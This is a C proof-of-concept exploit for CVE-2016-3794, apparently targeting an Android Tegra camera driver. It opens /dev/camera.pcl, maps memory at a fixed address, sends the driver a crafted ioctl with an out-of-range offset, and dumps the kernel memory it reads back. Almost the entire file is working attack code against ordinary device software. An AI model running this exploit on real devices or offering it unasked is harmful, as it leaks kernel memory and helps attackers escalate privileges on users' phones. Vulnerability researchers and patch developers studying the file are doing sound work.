CVE-2016-3794.c

/***  CVE-2016-3794.c
 *
 * https://code.google.com/p/android/issues/detail?id=208811
 * https://android.googlesource.com/kernel/tegra.git/+/android-tegra-flounder-3.10-n-preview-2/drivers/media/platform/tegra/camera.c#672
 *
 *
 */



#include <stdlib.h>
#include <stdio.h>
#include <stdbool.h>
#include <strings.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

typedef uint32_t __u32;
typedef unsigned char __u8;

const char *dev = "/dev/camera.pcl";

#define CAMERA_MAX_NAME_LENGTH  32
#define VIRTUAL_DEV_MAX_REGULATORS      8
#define VIRTUAL_DEV_MAX_GPIOS           8
#define VIRTUAL_DEV_MAX_POWER_SIZE      32
#define VIRTUAL_REGNAME_SIZE            (VIRTUAL_DEV_MAX_REGULATORS * \
					 CAMERA_MAX_NAME_LENGTH) //256

enum {
        CAMERA_DEVICE_TYPE_I2C,
        CAMERA_DEVICE_TYPE_MAX_NUM,
};

enum regcache_type {
        REGCACHE_NONE,
        REGCACHE_RBTREE,
        REGCACHE_COMPRESSED,
        REGCACHE_FLAT,
};

struct regmap_cfg {
        int addr_bits;
        int val_bits;
        __u32 cache_type;
};


struct nvc_param {
	__u32 param;
	__u32 sizeofvalue;
	__u32 variant;
	__u32 variant2;
	__u32 addr;
} __packed;

#define PCLLK_IOCTL_LAYOUT_RD   _IOWR('o', 121, struct nvc_param)


int main(void)
{
	int fd, i;
	struct nvc_param vdev = { 0 };
	fd = open(dev, O_RDWR);
	if (fd < 0) {
		printf("Failed to open %s with errno as %s\n",
		       dev, strerror(errno));
		return EXIT_FAILURE;
	}

	vdev.sizeofvalue = 4096;
	vdev.variant = 4096 + 0xFFFF8000;
	/* Too lazy to download the 32bit compiler, please forgive me for
	   this monstrosity:
	 */
	vdev.addr = (uint32_t) mmap(0x41414141, 4096 * 2, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_POPULATE|MAP_FIXED, -1, 0);

	if ((void*)vdev.addr == MAP_FAILED) {
		printf("mmap failed with %s\n", strerror(errno));
		return EXIT_FAILURE;
	}
	ioctl(fd, PCLLK_IOCTL_LAYOUT_RD, &vdev);

	printf("mem dump is \n");
	for (i = 0; i < 4096 / sizeof(int); i += 4)
		printf("%x ", *(int *)((void *) vdev.addr + i));

	printf("\n");

	return EXIT_FAILURE;
}